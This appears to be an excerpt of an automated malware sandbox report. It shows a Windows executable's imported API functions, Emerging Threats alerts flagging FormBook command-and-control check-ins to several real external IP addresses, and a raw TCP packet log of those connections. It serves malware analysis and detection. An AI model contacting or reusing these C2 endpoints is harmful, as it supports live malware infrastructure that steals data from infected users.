EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, ReleaseDC, GetDC, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, TrackPopupMenuEx, BlockInput, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, LockWindowUpdate, keybd_event, DispatchMessageW, ScreenToClient
                                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-11-12T18:47:17.633437+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449730TCP
                                                                    2024-11-12T18:47:46.267595+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973698.124.224.1780TCP
                                                                    2024-11-12T18:47:46.267595+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973698.124.224.1780TCP
                                                                    2024-11-12T18:47:57.501910+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449738TCP
                                                                    2024-11-12T18:48:02.074779+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449758104.21.41.7480TCP
                                                                    2024-11-12T18:48:04.625836+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449770104.21.41.7480TCP
                                                                    2024-11-12T18:48:07.192766+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449782104.21.41.7480TCP
                                                                    2024-11-12T18:48:09.777331+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449798104.21.41.7480TCP
                                                                    2024-11-12T18:48:09.777331+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449798104.21.41.7480TCP
                                                                    2024-11-12T18:48:15.769963+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449830172.67.137.23880TCP
                                                                    2024-11-12T18:48:18.276499+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449845172.67.137.23880TCP
                                                                    2024-11-12T18:48:20.844466+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449861172.67.137.23880TCP
                                                                    2024-11-12T18:48:23.537681+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449876172.67.137.23880TCP
                                                                    2024-11-12T18:48:23.537681+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449876172.67.137.23880TCP
                                                                    2024-11-12T18:48:29.646287+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44990838.47.232.20280TCP
                                                                    2024-11-12T18:48:32.161899+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44992338.47.232.20280TCP
                                                                    2024-11-12T18:48:34.724273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44993938.47.232.20280TCP
                                                                    2024-11-12T18:48:37.271181+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44995538.47.232.20280TCP
                                                                    2024-11-12T18:48:37.271181+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44995538.47.232.20280TCP
                                                                    2024-11-12T18:48:51.297347+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001513.248.169.4880TCP
                                                                    2024-11-12T18:48:53.918069+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001613.248.169.4880TCP
                                                                    2024-11-12T18:48:56.457408+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001713.248.169.4880TCP
                                                                    2024-11-12T18:48:59.030683+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001813.248.169.4880TCP
                                                                    2024-11-12T18:48:59.030683+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45001813.248.169.4880TCP
                                                                    2024-11-12T18:49:05.580737+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001938.47.207.16480TCP
                                                                    2024-11-12T18:49:07.928658+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002038.47.207.16480TCP
                                                                    2024-11-12T18:49:10.473142+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002138.47.207.16480TCP
                                                                    2024-11-12T18:49:13.004291+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002238.47.207.16480TCP
                                                                    2024-11-12T18:49:13.004291+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002238.47.207.16480TCP
                                                                    2024-11-12T18:49:18.835470+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500233.33.130.19080TCP
                                                                    2024-11-12T18:49:21.375038+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500243.33.130.19080TCP
                                                                    2024-11-12T18:49:23.922622+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500253.33.130.19080TCP
                                                                    2024-11-12T18:49:26.483031+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500263.33.130.19080TCP
                                                                    2024-11-12T18:49:26.483031+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500263.33.130.19080TCP
                                                                    2024-11-12T18:49:32.628723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027103.21.221.480TCP
                                                                    2024-11-12T18:49:35.159902+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028103.21.221.480TCP
                                                                    2024-11-12T18:49:37.707674+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029103.21.221.480TCP
                                                                    2024-11-12T18:49:40.253507+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450030103.21.221.480TCP
                                                                    2024-11-12T18:49:40.253507+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450030103.21.221.480TCP
                                                                    2024-11-12T18:49:46.307375+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450031203.161.46.20180TCP
                                                                    2024-11-12T18:49:48.868214+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032203.161.46.20180TCP
                                                                    2024-11-12T18:49:52.253277+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033203.161.46.20180TCP
                                                                    2024-11-12T18:49:54.144579+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450034203.161.46.20180TCP
                                                                    2024-11-12T18:49:54.144579+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450034203.161.46.20180TCP
                                                                    2024-11-12T18:50:00.395741+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450035104.21.4.9380TCP
                                                                    2024-11-12T18:50:02.925585+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036104.21.4.9380TCP
                                                                    2024-11-12T18:50:05.476478+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037104.21.4.9380TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 12, 2024 18:47:45.629592896 CET4973680192.168.2.498.124.224.17
                                                                    Nov 12, 2024 18:47:45.634454966 CET804973698.124.224.17192.168.2.4
                                                                    Nov 12, 2024 18:47:45.634553909 CET4973680192.168.2.498.124.224.17
                                                                    Nov 12, 2024 18:47:45.642328024 CET4973680192.168.2.498.124.224.17
                                                                    Nov 12, 2024 18:47:45.647165060 CET804973698.124.224.17192.168.2.4
                                                                    Nov 12, 2024 18:47:46.267258883 CET804973698.124.224.17192.168.2.4
                                                                    Nov 12, 2024 18:47:46.267323017 CET804973698.124.224.17192.168.2.4
                                                                    Nov 12, 2024 18:47:46.267595053 CET4973680192.168.2.498.124.224.17
                                                                    Nov 12, 2024 18:47:46.286819935 CET804973698.124.224.17192.168.2.4
                                                                    Nov 12, 2024 18:47:46.287048101 CET4973680192.168.2.498.124.224.17
                                                                    Nov 12, 2024 18:47:46.293879986 CET4973680192.168.2.498.124.224.17
                                                                    Nov 12, 2024 18:47:46.298836946 CET804973698.124.224.17192.168.2.4
                                                                    Nov 12, 2024 18:48:01.357827902 CET4975880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:01.362771034 CET8049758104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:01.362838030 CET4975880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:01.374057055 CET4975880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:01.379765034 CET8049758104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:02.074147940 CET8049758104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:02.074696064 CET8049758104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:02.074779034 CET4975880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:02.881688118 CET4975880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:03.900473118 CET4977080192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:03.905827045 CET8049770104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:03.905899048 CET4977080192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:03.916635036 CET4977080192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:03.921643019 CET8049770104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:04.622538090 CET8049770104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:04.625715971 CET8049770104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:04.625835896 CET4977080192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:05.428627968 CET4977080192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:06.484814882 CET4978280192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:06.489753962 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.489839077 CET4978280192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:06.506959915 CET4978280192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:06.512088060 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.512145996 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.512207985 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.512217999 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.512252092 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.512260914 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.512336969 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.512346983 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:06.512357950 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:07.190120935 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:07.192686081 CET8049782104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:07.192765951 CET4978280192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:08.022089005 CET4978280192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:09.040781021 CET4979880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:09.046178102 CET8049798104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:09.046262026 CET4979880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:09.053576946 CET4979880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:09.059902906 CET8049798104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:09.773437977 CET8049798104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:09.777209997 CET8049798104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:09.777331114 CET4979880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:09.778492928 CET4979880192.168.2.4104.21.41.74
                                                                    Nov 12, 2024 18:48:09.784734964 CET8049798104.21.41.74192.168.2.4
                                                                    Nov 12, 2024 18:48:14.957611084 CET4983080192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:14.964188099 CET8049830172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:14.964308023 CET4983080192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:14.977797031 CET4983080192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:14.985857010 CET8049830172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:15.751185894 CET8049830172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:15.769788027 CET8049830172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:15.769963026 CET4983080192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:16.490794897 CET4983080192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:17.509414911 CET4984580192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:17.515084982 CET8049845172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:17.515286922 CET4984580192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:17.525497913 CET4984580192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:17.531016111 CET8049845172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:18.257158995 CET8049845172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:18.276411057 CET8049845172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:18.276499033 CET4984580192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:19.037396908 CET4984580192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:20.056664944 CET4986180192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:20.061737061 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.061839104 CET4986180192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:20.074323893 CET4986180192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:20.079431057 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.079451084 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.079462051 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.079494953 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.079504013 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.079513073 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.079523087 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.080354929 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.080364943 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.825866938 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.844383955 CET8049861172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:20.844465971 CET4986180192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:21.584110975 CET4986180192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:22.603147030 CET4987680192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:22.796844959 CET8049876172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:22.798012018 CET4987680192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:22.805389881 CET4987680192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:22.810405970 CET8049876172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:23.537311077 CET8049876172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:23.537611961 CET8049876172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:23.537681103 CET4987680192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:23.557256937 CET8049876172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:23.557369947 CET4987680192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:23.558233976 CET4987680192.168.2.4172.67.137.238
                                                                    Nov 12, 2024 18:48:23.563021898 CET8049876172.67.137.238192.168.2.4
                                                                    Nov 12, 2024 18:48:28.602534056 CET4990880192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:28.607441902 CET804990838.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:28.607511997 CET4990880192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:28.617837906 CET4990880192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:28.623507977 CET804990838.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:29.595937014 CET804990838.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:29.646286964 CET4990880192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:29.778655052 CET804990838.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:29.778768063 CET4990880192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:30.130740881 CET4990880192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:31.149254084 CET4992380192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:31.154150963 CET804992338.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:31.154246092 CET4992380192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:31.164441109 CET4992380192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:31.169356108 CET804992338.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:32.109539986 CET804992338.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:32.161899090 CET4992380192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:32.291152954 CET804992338.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:32.291255951 CET4992380192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:32.695492029 CET4992380192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:33.711702108 CET4993980192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:33.716671944 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.716799021 CET4993980192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:33.727041960 CET4993980192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:33.731995106 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.732023954 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.732228994 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.732238054 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.732305050 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.732314110 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.732420921 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.732481003 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:33.732489109 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:34.671842098 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:34.724272966 CET4993980192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:34.855041027 CET804993938.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:34.855099916 CET4993980192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:35.239988089 CET4993980192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:36.258512974 CET4995580192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:36.263516903 CET804995538.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:36.263592958 CET4995580192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:36.271267891 CET4995580192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:36.276046991 CET804995538.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:37.220454931 CET804995538.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:37.271181107 CET4995580192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:37.402326107 CET804995538.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:37.402425051 CET4995580192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:37.403450012 CET4995580192.168.2.438.47.232.202
                                                                    Nov 12, 2024 18:48:37.408288956 CET804995538.47.232.202192.168.2.4
                                                                    Nov 12, 2024 18:48:50.574516058 CET5001580192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:50.581178904 CET805001513.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:50.581316948 CET5001580192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:50.631124020 CET5001580192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:50.636094093 CET805001513.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:51.297297955 CET805001513.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:51.297347069 CET5001580192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:52.149035931 CET5001580192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:52.153892040 CET805001513.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:53.210756063 CET5001680192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:53.216062069 CET805001613.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:53.216159105 CET5001680192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:53.256110907 CET5001680192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:53.260984898 CET805001613.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:53.917865038 CET805001613.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:53.918068886 CET5001680192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:54.770554066 CET5001680192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:54.775701046 CET805001613.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.789262056 CET5001780192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:55.794388056 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.795198917 CET5001780192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:55.806242943 CET5001780192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:55.811306953 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.811336994 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.811352015 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.811357975 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.811367989 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.811372995 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.811559916 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.811568975 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:55.811611891 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:56.457340956 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:56.457407951 CET5001780192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:57.317378998 CET5001780192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:57.322948933 CET805001713.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:58.336328983 CET5001880192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:58.341404915 CET805001813.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:58.341552019 CET5001880192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:58.348754883 CET5001880192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:58.353934050 CET805001813.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:58.999310970 CET805001813.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:59.030550003 CET805001813.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:48:59.030683041 CET5001880192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:59.031733036 CET5001880192.168.2.413.248.169.48
                                                                    Nov 12, 2024 18:48:59.036894083 CET805001813.248.169.48192.168.2.4
                                                                    Nov 12, 2024 18:49:04.355200052 CET5001980192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:04.365180969 CET805001938.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:04.365272045 CET5001980192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:04.379703999 CET5001980192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:04.387337923 CET805001938.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:05.580292940 CET805001938.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:05.580653906 CET805001938.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:05.580682993 CET805001938.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:05.580737114 CET5001980192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:05.880590916 CET5001980192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:06.901134968 CET5002080192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:06.906332016 CET805002038.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:06.906398058 CET5002080192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:06.923726082 CET5002080192.168.2.438.47.207.164
                                                                    Nov 12, 2024 18:49:06.928775072 CET805002038.47.207.164192.168.2.4
                                                                    Nov 12, 2024 18:49:07.868855000 CET805002038.47.207.164192.168.2.4
